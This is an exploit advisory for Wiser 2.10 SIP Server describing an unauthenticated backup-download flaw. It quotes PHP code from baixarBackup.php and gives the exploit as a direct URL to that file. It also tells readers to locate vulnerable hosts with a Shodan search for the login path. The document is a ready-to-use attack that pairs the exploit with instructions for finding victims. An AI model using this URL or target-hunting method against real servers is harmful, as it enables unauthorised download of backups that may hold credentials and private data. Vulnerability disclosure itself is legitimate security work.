Wiser 2.10 [SIP SERVER] - Backup download vulnerability
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.develsistemas.com.br/
####################################################################
VULNERABILITY
##############
/var/www/html/voip/sipserver/class/baixarBackup.php
Line 3:
require_once '/var/www/html/voip/sipserver/class/conexao.php';
Line 55-59:
function buscaBackup() {
$this->conectarSer();
$sql = "SELECT patch FROM backup WHERE patch IS NOT NULL ORDER BY
id DESC LIMIT 1";
$result = mysql_query($sql);
return $result ? (mysql_num_rows($result)>0 ? mysql_result
($result, 0, 'patch') : false) : false;
#########
EXPLOIT
#########
http://IP/voip/sipserver/class/baixarBackup.php
[Note]: To Find This Ip Go To shodanhq.com And Type Location:
voip/sipserver/login In Search Box
